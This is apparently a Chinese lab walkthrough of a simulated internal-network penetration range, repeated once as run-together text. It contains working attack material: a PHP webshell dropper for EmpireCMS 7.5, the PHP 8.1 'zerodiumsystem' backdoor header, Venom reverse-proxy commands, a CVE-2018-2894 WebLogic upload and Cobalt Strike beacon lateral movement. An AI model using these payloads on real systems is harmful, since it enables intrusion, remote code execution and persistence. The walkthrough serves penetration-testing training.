内网域渗透靶场实战教学文档

靶场概述

本靶场是一个模拟内网域环境的渗透测试场景，包含多台主机和多种常见漏洞。靶场拓扑结构包括外网打点和内网渗透两个主要阶段，涉及Web应用漏洞利用、数据库渗透、横向移动、权限提升等多个知识点。

外网打点阶段

1. 初始信息收集

使用Nmap进行网段扫描：

nmap -sN -PE 192.168.1.0/24

扫描结果：

192.168.1.9: 22端口(SSH)
192.168.1.10: 8080端口(Web服务)
192.168.1.11: 3306端口(MySQL)
192.168.1.12: 主机名hack1(未扫描出端口)
192.168.1.13: 主机名hack2(未扫描出端口)

2. PBOOTCMS漏洞利用

访问192.168.1.12的80端口，发现PBOOTCMS V2.0.8
通过/doc/ChangeLog.txt确认版本
访问后台地址，使用弱口令admin/admin123登录
尝试构造代码执行失败后，进行详细端口扫描发现88端口

3. 帝国CMS漏洞利用

访问192.168.1.12:88，发现帝国CMS
后台地址/e/admin，同样使用弱口令admin/admin123
利用EmpireCMS 7.5漏洞：
- 数据库备份时未验证表名
- /e/class/moddofun.php的LoadInMod函数存在漏洞
上传Webshell：
- 创建1.php内容：
```
<?php file_put_contents("getshell.php", "<?php @eval(\$_POST[cmd]); ?>"); ?>
```
- 重命名为1.php.mod上传
- 访问http://192.168.1.12:88/e/admin/getshell.php获取Webshell

4. 信息收集与数据库渗透

在根目录找到第一个flag
查看config.php发现站库分离配置，数据库IP为192.168.1.13
使用蚁剑的MYSQLI连接(注意使用3308端口)
在数据库中找到第二个flag

5. PHP 8.1后门漏洞利用

访问192.168.1.10:8080，发现简单页面
通过Wappalyzer或抓包识别PHP 8.1
利用PHP 8.1后门漏洞：
```
User-Agentt: zerodiumsystem("ls");
```
获取第三个flag

内网渗透阶段

1. 内网发现与代理设置

ipconfig发现双网卡，内网段为10.10.10.0/24
使用CS生成木马上传执行
使用Venom进行流量代理：
- 本地监听：admin.exe -lport 9999
- 目标执行：agent.exe -rhost 192.168.1.2 -rport 9999
- 配置浏览器代理访问内网

2. Weblogic漏洞利用

扫描发现10.10.10.10:7001(Weblogic)
识别版本为12.2.1.3
利用CVE-2018-2894漏洞：
- 在数据库中找到后台账号密码
- 登录后台打开web测试页
- 访问http://10.10.10.10:7001/ws_utc/config.do
- 修改工作目录为：
```
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\com.oracle.webservices.wls.ws-testclient-app-wls\4mcj4y\war\css
```
- 上传冰蝎马，通过F12获取时间戳构造访问路径
- 连接冰蝎获取Webshell

3. 横向移动与权限维持

在根目录找到第四个flag
发现root.txt文件，尝试SSH连接
获取第五个flag
使用TCP Beacon上线不出网主机：
- 创建TCP Beacon监听
- 使用Stageless模式生成beacon.exe
- 上传到可写目录(如/tmp)
- 执行beacon.exe并使用connect 10.10.10.10连接

关键知识点总结

信息收集：Nmap扫描、版本识别、配置文件查看
漏洞利用：
- PBOOTCMS后台弱口令
- EmpireCMS 7.5文件上传漏洞
- PHP 8.1后门漏洞
- Weblogic CVE-2018-2894
数据库渗透：站库分离、非标准端口连接
内网代理：Venom使用、CS代理
横向移动：不出网主机上线(TCP Beacon)、Stager与Stageless区别
权限维持：Webshell上传、后门植入

后续工作

权限提升(将在下半部分详细讲解)
域渗透技术
更复杂的内网横向移动技术

防御建议

避免使用弱口令
及时更新补丁
限制数据库远程访问
监控异常文件上传
网络隔离与访问控制
日志审计与分析

内网域渗透靶场实战教学文档靶场概述本靶场是一个模拟内网域环境的渗透测试场景，包含多台主机和多种常见漏洞。靶场拓扑结构包括外网打点和内网渗透两个主要阶段，涉及Web应用漏洞利用、数据库渗透、横向移动、权限提升等多个知识点。外网打点阶段 1. 初始信息收集使用Nmap进行网段扫描：扫描结果： 192.168.1.9: 22端口(SSH) 192.168.1.10: 8080端口(Web服务) 192.168.1.11: 3306端口(MySQL) 192.168.1.12: 主机名hack1(未扫描出端口) 192.168.1.13: 主机名hack2(未扫描出端口) 2. PBOOTCMS漏洞利用访问192.168.1.12的80端口，发现PBOOTCMS V2.0.8 通过 /doc/ChangeLog.txt 确认版本访问后台地址，使用弱口令 admin/admin123 登录尝试构造代码执行失败后，进行详细端口扫描发现88端口 3. 帝国CMS漏洞利用访问192.168.1.12:88，发现帝国CMS 后台地址 /e/admin ，同样使用弱口令 admin/admin123 利用EmpireCMS 7.5漏洞：数据库备份时未验证表名 /e/class/moddofun.php 的 LoadInMod 函数存在漏洞上传Webshell：创建 1.php 内容：重命名为 1.php.mod 上传访问 http://192.168.1.12:88/e/admin/getshell.php 获取Webshell 4. 信息收集与数据库渗透在根目录找到第一个flag 查看 config.php 发现站库分离配置，数据库IP为192.168.1.13 使用蚁剑的MYSQLI连接(注意使用3308端口) 在数据库中找到第二个flag 5. PHP 8.1后门漏洞利用访问192.168.1.10:8080，发现简单页面通过Wappalyzer或抓包识别PHP 8.1 利用PHP 8.1后门漏洞：获取第三个flag 内网渗透阶段 1. 内网发现与代理设置 ipconfig 发现双网卡，内网段为10.10.10.0/24 使用CS生成木马上传执行使用Venom进行流量代理：本地监听： admin.exe -lport 9999 目标执行： agent.exe -rhost 192.168.1.2 -rport 9999 配置浏览器代理访问内网 2. Weblogic漏洞利用扫描发现10.10.10.10:7001(Weblogic) 识别版本为12.2.1.3 利用CVE-2018-2894漏洞：在数据库中找到后台账号密码登录后台打开web测试页访问 http://10.10.10.10:7001/ws_utc/config.do 修改工作目录为：上传冰蝎马，通过F12获取时间戳构造访问路径连接冰蝎获取Webshell 3. 横向移动与权限维持在根目录找到第四个flag 发现 root.txt 文件，尝试SSH连接获取第五个flag 使用TCP Beacon上线不出网主机：创建TCP Beacon监听使用Stageless模式生成beacon.exe 上传到可写目录(如/tmp) 执行 beacon.exe 并使用 connect 10.10.10.10 连接关键知识点总结信息收集：Nmap扫描、版本识别、配置文件查看漏洞利用： PBOOTCMS后台弱口令 EmpireCMS 7.5文件上传漏洞 PHP 8.1后门漏洞 Weblogic CVE-2018-2894 数据库渗透：站库分离、非标准端口连接内网代理：Venom使用、CS代理横向移动：不出网主机上线(TCP Beacon)、Stager与Stageless区别权限维持：Webshell上传、后门植入后续工作权限提升(将在下半部分详细讲解) 域渗透技术更复杂的内网横向移动技术防御建议避免使用弱口令及时更新补丁限制数据库远程访问监控异常文件上传网络隔离与访问控制日志审计与分析